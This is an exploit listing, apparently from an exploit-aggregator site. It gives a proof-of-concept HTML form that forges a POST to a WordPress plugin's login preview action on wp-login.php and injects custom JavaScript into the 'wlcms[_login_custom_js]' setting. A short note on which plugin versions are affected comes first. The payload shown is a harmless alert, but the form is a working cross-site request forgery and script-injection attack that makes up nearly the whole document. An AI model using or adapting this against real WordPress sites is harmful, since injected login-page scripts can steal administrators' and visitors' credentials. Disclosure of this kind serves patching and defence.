## https://sploitus.com/exploit?id=WPEX-ID:429BE4EB-8A6B-4531-9465-9EF0D35C12CC
In v < 2.2.8, both unauthenticated and authenticated users can be attacked with it. In 2.2.8, it will only trigger against authenticated user
<html>
<body>
<form action="https://example.com/wp-login.php?wlcms-action=preview" method="POST">
<input type="text" value='alert(/XSS/);' name="wlcms[_login_custom_js]" />
<input type="submit" value="Exploit me pls" />
</form>
</body>
</html>